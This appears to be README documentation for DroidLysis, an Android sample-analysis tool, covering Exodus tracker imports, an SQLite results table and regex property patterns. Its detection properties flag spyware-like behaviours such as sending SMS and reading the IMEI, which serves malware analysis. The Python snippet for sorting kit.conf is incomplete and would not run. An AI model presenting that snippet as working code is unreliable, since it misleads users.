DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

SQLite database{#sqlite_database}

If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.

For example, to retrieve all filename, SHA256 sum and smali properties of the database:

sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,

Property patterns

What DroidLysis detects can be configured and extended in the files of the ./conf directory.

A pattern consist of:

  • a tag name: example send_sms. This is to name the property. Must be unique across the .conf file.
  • a pattern: this is a regexp to be matched. Ex: ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is match on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
  • a description (optional): explains the importance of the property and what it means.
description=Sending SMS messages

Importing Exodus Privacy Trackers

Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import_exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

Afterwards, you may want to sort your kit.conf file:

import configparser
import collections
import os

config = configparser.ConfigParser({}, collections.OrderedDict)
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf','w') as f:


  • v3.4.6 - Detecting manifest feature that automatically loads APK at install
  • v3.4.5 - Creating a writable user kit.conf file
  • v3.4.4 - Bug fix #14
  • v3.4.3 - Using configuration files
  • v3.4.2 - Adding import of Exodus Privacy Trackers
  • v3.4.1 - Removed dependency to Androguard
  • v3.4.0 - Multidex support
  • v3.3.1 - Improving detection of Base64 strings
  • v3.3.0 - Dumping data to JSON
  • v3.2.1 - IP address detection
  • v3.2.0 - Dex2jar is optional
  • v3.1.0 - Detection of Base64 strings
